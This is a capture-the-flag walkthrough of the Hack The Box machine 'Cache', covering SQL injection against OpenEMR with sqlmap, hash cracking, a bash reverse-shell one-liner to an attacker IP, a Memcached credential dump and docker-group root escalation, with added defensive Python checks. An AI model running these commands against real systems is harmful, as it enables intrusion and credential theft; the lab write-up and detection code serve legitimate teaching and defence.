
HTB Cache Walkthrough
Cache is a medium Linux box that needs a lot of enumeration. It requires chaining multiple exploits together and cracking a hash to get a shell on the server, then pentesting an internal Memcached server to own the second user, and finally abusing a Docker container to get root privileges on the server.
Reconnaissance
We start with an Nmap scan to check the open ports and the services running on the server
nmap -sT -sC -sV 10.10.10.188
- -sT to run a TCP connect scan
- -sC to run Nmap's default script scan
- -sV to enumerate service versions

We see that we have:
- Port 22 (SSH) is open and runs OpenSSH 7.6p1
- Port 80 (HTTP) is open and runs Apache/2.4.29
I ran gobuster to enumerate hidden directories
gobuster dir -u http://10.10.10.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
While gobuster was brute-forcing directories, I started manual HTTP enumeration: I opened http://10.10.10.188/ and got a web page

I clicked Login and was redirected to a login page

I tried default credentials like user:password, admin:admin and admin:password, but nothing worked.
I tried SQL injection on the login form, but it didn't work.
I checked the gobuster results

I opened the /jquery directory and found a JavaScript file named functionality.js

I opened it and found the JavaScript functions used for authentication, with the login credentials hard-coded in them: the user ash with the password H@v3_fun

I went back to the login page, tried those credentials, managed to log in, and was redirected to /net.html
I checked the page source but could not find anything useful, so I went down a rabbit hole for a while investigating the image with stego tools and got nothing. I took a short pause, came back, surfed the website again, and something caught my attention when I read what is written in /author.html

“Check out his other projects like Cache:
HMS(Hospital Management System)”
Hmm, could that be a domain name?
I opened /etc/hosts and added hms.htb to it

I opened hms.htb in the browser and got an OpenEMR instance, which is “a medical practice management software which also supports Electronic Medical Records (EMR)”

Again I tried default credentials like admin:admin and admin:password, but could not log in.
I ran gobuster against it and got

It took me a while to enumerate these directories manually. I found the Patient Portal login in /portal, but how could I proceed further without credentials?
I used searchsploit to look for public vulnerabilities in OpenEMR and got tons of results

We do not know the version of the software, so it is hard to decide which exploit to use, but the page footer says “Copyright © 2018 OpenEmr”, so I assumed this version was released in 2018. I googled “openEMR release history” and got

There is a high probability that the version is 5.0.1
I used searchsploit to look for vulnerabilities in this specific version and found an RCE, but it requires authentication

We need credentials for that.
I started googling OpenEMR vulnerabilities, moved from one link to another, and came across the PDF document OpenEMR v5.0.1.3 — Vulnerability Report
I went through the report and found

We can access /add_edit_event_user.php without authentication, and it is vulnerable to SQL injection in the eid parameter, so I intercepted the request with Burp

and copied its content to a file named request.req

Exploitation:
I ran sqlmap on the file containing the captured request
sqlmap -r request.req --dbs
I got two databases

and I targeted the openemr database
sqlmap -r request.req -D openemr --tables
I got all the tables in openemr, and the interesting one was users_secure

I dumped its contents with this command
sqlmap -r request.req -D openemr -T users_secure --dump

Username: openemr_admin
Password: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
A second way to dump the database:
There is an auxiliary module in Metasploit that exploits this injection
sqli/openemr/openemr_sqli_dump
I ran it in the background out of curiosity, and it took four hours to dump all the tables of the database.
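From the defender's side, the requests above leave a clear trace: the eid parameter of add_edit_event_user.php should only ever be numeric. The following is an added example (not part of the write-up) that scans Apache combined-format access log lines for that pattern; the sample lines are constructed, and the script path is assumed to sit at the document root as the write-up gives it, so the check matches on the file name only.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" access-log line: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business inside a numeric event id
SQL_TOKENS = re.compile(r"(['\"#]|--|/\*|\b(union|select|sleep|benchmark|and|or)\b)", re.I)
TARGET_SCRIPT = "add_edit_event_user.php"   # vulnerable script named in the report

def inspect_line(line):
    """Return a finding dict for a suspicious request to the vulnerable script, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.rsplit("/", 1)[-1] != TARGET_SCRIPT:
        return None
    reasons = []
    for eid in parse_qs(url.query, keep_blank_values=True).get("eid", []):
        decoded = unquote_plus(eid)          # second decode catches double-encoded payloads
        if not decoded.isdigit():
            tok = SQL_TOKENS.search(decoded)
            reasons.append(f"non-numeric eid {decoded!r}"
                           + (f" with SQL token {tok.group(0)!r}" if tok else ""))
    if "sqlmap" in m["ua"].lower():          # sqlmap announces itself unless told not to
        reasons.append("sqlmap user-agent")
    return {"ip": m["ip"], "time": m["ts"], "status": m["status"], "reasons": reasons} if reasons else None

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the hits."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log lines (not taken from the box); timestamps and sizes are made up
SAMPLE_LOG = [
    '10.10.14.64 - - [18/May/2020:10:00:01 +0000] "GET /add_edit_event_user.php?eid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.64 - - [18/May/2020:10:00:02 +0000] "GET /add_edit_event_user.php?eid=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '10.10.14.64 - - [18/May/2020:10:00:03 +0000] "GET /add_edit_event_user.php?eid=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.10.14.64 - - [18/May/2020:10:00:04 +0000] "GET /portal/index.php?site=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```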


Cracking the hash:
I created a file named hash using nano, copied the hash into it, and used john with the rockyou wordlist to crack it
john -w=/usr/share/wordlists/rockyou.txt hash
Within a few seconds the hash was cracked, and the password was xxxxxx

Now we have a username and password: openemr_admin:xxxxxx
We can try the RCE vulnerability with these credentials.
I tried the exploit using Metasploit, but it didn't work.
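Part of why the crack took only seconds is visible in the hash itself: the $2a$05$ prefix means a bcrypt cost of 5, i.e. only 32 key-setup rounds per guess. As an added example (not part of the write-up), the parser below splits a bcrypt string into its fields and reports how far it falls below a policy floor; the floor of 10 is an assumed value, not something the box or OpenEMR states.

```python
import re

# Modular-crypt bcrypt string: $<variant>$<cost>$<22-char salt><31-char digest>, bcrypt base64 alphabet
BCRYPT_RE = re.compile(r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
                       r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$")

def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields; raise ValueError if it is not well-formed."""
    m = BCRYPT_RE.match(hash_str.strip())
    if not m:
        raise ValueError("not a bcrypt hash")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:                 # the only cost range bcrypt itself accepts
        raise ValueError(f"cost {cost} out of range")
    return {"variant": m["variant"], "cost": cost, "salt": m["salt"], "digest": m["digest"]}

def audit_bcrypt(hash_str, min_cost=10):
    """Report the key-setup rounds a hash demands and how much cheaper it is than the policy floor."""
    fields = parse_bcrypt(hash_str)
    rounds = 2 ** fields["cost"]            # bcrypt runs 2^cost expensive key-setup rounds
    return {
        "cost": fields["cost"],
        "rounds": rounds,
        "meets_policy": fields["cost"] >= min_cost,
        # guesses-per-second advantage an attacker gets over a hash stored at min_cost
        "speedup_vs_policy": 2 ** max(min_cost - fields["cost"], 0),
    }

# The hash dumped from users_secure in the write-up (cost 05 = 32 rounds)
DUMPED_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

if __name__ == "__main__":
    print(audit_bcrypt(DUMPED_HASH))
```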

So I mirrored the exploit from Exploit-DB to my machine using the command
searchsploit -m exploits/php/webapps/45161.py
and renamed it using the mv command
mv 45161.py cache.py
I started a Netcat listener on port 4444 and ran the exploit
python cache.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.64/4444 0>&1'
and I got a shell on the server as www-data

I upgraded the shell with the following commands and moved on to privilege escalation
python3 -c 'import pty;pty.spawn("/bin/bash");'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm-256color
Privilege Escalation:
The users on the server are ash and luffy

We got ash's credentials during the first enumeration phase (from the JavaScript file “functionality.js”); his password was H@v3_fun. I tried
su ash
and entered the password H@v3_fun, and we owned the user ash

Escalating from ash to luffy:
I started with basic enumeration commands, and something caught my attention while I was checking the network connections on the server.
Port 11211 was open (internally only), which looked abnormal to me

A quick Google search told me that the service running on this port is a Memcached server, which is “a general-purpose distributed memory caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API)”
I found this article about pentesting Memcached servers
I connected to the server using telnet
telnet 127.0.0.1 11211

I dumped all the keys in the slab with ID 1 using the command
stats cachedump 1 0
I got

I used the get command to fetch the values stored under those keys, and got luffy's password, which was 0n3_p1ec3

I tried
su luffy
entered his password 0n3_p1ec3, and owned luffy
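Memcached speaks a plain text protocol with no authentication, so anything an application caches is readable by whoever can reach the port, which is the whole lesson of this step. As an added example (not part of the write-up), here is a parser for the two replies used above, stats cachedump and get, together with a hygiene check a team can run against its own cache to catch credential-like entries before an attacker does. The sample replies are constructed, not the box's real contents.

```python
import re

# memcached text-protocol reply formats (as seen in the telnet session)
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")      # from "stats cachedump <slab> <limit>"
VALUE_RE = re.compile(r"^VALUE (\S+) (\d+) (\d+)(?: (\d+))?$")  # from "get <key> ..."; optional cas id
SENSITIVE_KEY = re.compile(r"pass|pwd|secret|token|cred|apikey", re.I)

def parse_cachedump(text):
    """Parse a cachedump reply into {key: (size_bytes, expiry)}; stops at END."""
    items = {}
    for line in text.splitlines():
        if line == "END":
            break
        m = ITEM_RE.match(line)
        if m:
            items[m[1]] = (int(m[2]), int(m[3]))
    return items

def parse_get(raw):
    """Parse a get reply into {key: data_bytes}, trusting the declared byte count, not line breaks."""
    out, pos = {}, 0
    while True:
        end = raw.index(b"\r\n", pos)            # ValueError here means a truncated reply
        header = raw[pos:end].decode()
        if header == "END":
            return out
        m = VALUE_RE.match(header)
        if not m:
            raise ValueError(f"unexpected reply line: {header!r}")
        key, nbytes = m[1], int(m[3])
        start = end + 2
        if raw[start + nbytes:start + nbytes + 2] != b"\r\n":
            raise ValueError(f"data block for {key} does not match its declared length")
        out[key] = raw[start:start + nbytes]
        pos = start + nbytes + 2

def audit_cache(items, values):
    """Flag keys whose name or value suggests a credential is sitting in an unauthenticated cache."""
    findings = []
    for key in items:
        if SENSITIVE_KEY.search(key):
            findings.append(f"{key}: credential-like key name")
        elif key in values and re.match(rb"\$2[abxy]\$\d\d\$", values[key]):
            findings.append(f"{key}: value looks like a bcrypt hash")
    return findings

# Constructed sample replies (not the box's real cache contents)
SAMPLE_CACHEDUMP = "ITEM link [21 b; 0 s]\r\nITEM user [5 b; 0 s]\r\nITEM passwd [9 b; 0 s]\r\nEND\r\n"
SAMPLE_GET = b"VALUE user 0 5\r\nalice\r\nVALUE passwd 0 9\r\nhunter2!!\r\nEND\r\n"
```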

As soon as I ran the id command I noticed that the user luffy is a member of the docker group, so I searched for docker on GTFOBins
and got this

Note: you have to change “alpine” to the name of a Docker image present on the target; on this machine it was “ubuntu”
So I ran the following command and gained root privileges.
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
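Membership in the docker group is root-equivalent for exactly the reason the command above shows: the daemon runs as root and will happily bind-mount / into a container. As an added example (not part of the write-up), the check below resolves every account that ends up in such a group, either through the member list in /etc/group or through its primary GID in /etc/passwd, which a plain grep for the group line would miss. The sample account files are constructed; only the luffy/docker relationship mirrors the box.

```python
# Groups whose membership gives effective root on the host (assumed list; extend per environment)
ROOT_EQUIVALENT_GROUPS = ("docker",)

def parse_group(text):
    """/etc/group text -> {gid: (group_name, {explicitly listed members})}"""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[int(gid)] = (name, {m for m in members.split(",") if m})
    return groups

def parse_passwd(text):
    """/etc/passwd text -> {user_name: primary_gid}"""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            users[fields[0]] = int(fields[3])
    return users

def root_equivalent_users(group_text, passwd_text, groups=ROOT_EQUIVALENT_GROUPS):
    """Return {user: group} for every account in a root-equivalent group, by either membership path."""
    by_gid = parse_group(group_text)
    primary = parse_passwd(passwd_text)
    hits = {}
    for gid, (name, members) in by_gid.items():
        if name not in groups:
            continue
        for user in members:                      # supplementary membership via /etc/group
            hits[user] = name
        for user, pgid in primary.items():        # primary GID via /etc/passwd
            if pgid == gid:
                hits[user] = name
    return hits

# Constructed sample files (not copied from the box)
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:ash\ndocker:x:999:luffy\nusers:x:100:\n"
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "ash:x:1000:1000::/home/ash:/bin/bash\n"
                 "luffy:x:1001:1001::/home/luffy:/bin/bash\n"
                 "svc:x:1002:999::/home/svc:/usr/sbin/nologin\n")   # docker as primary group

if __name__ == "__main__":
    print("sample:", root_equivalent_users(SAMPLE_GROUP, SAMPLE_PASSWD))
    with open("/etc/group") as g, open("/etc/passwd") as p:       # live check on the host
        print("host:", root_equivalent_users(g.read(), p.read()))
```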
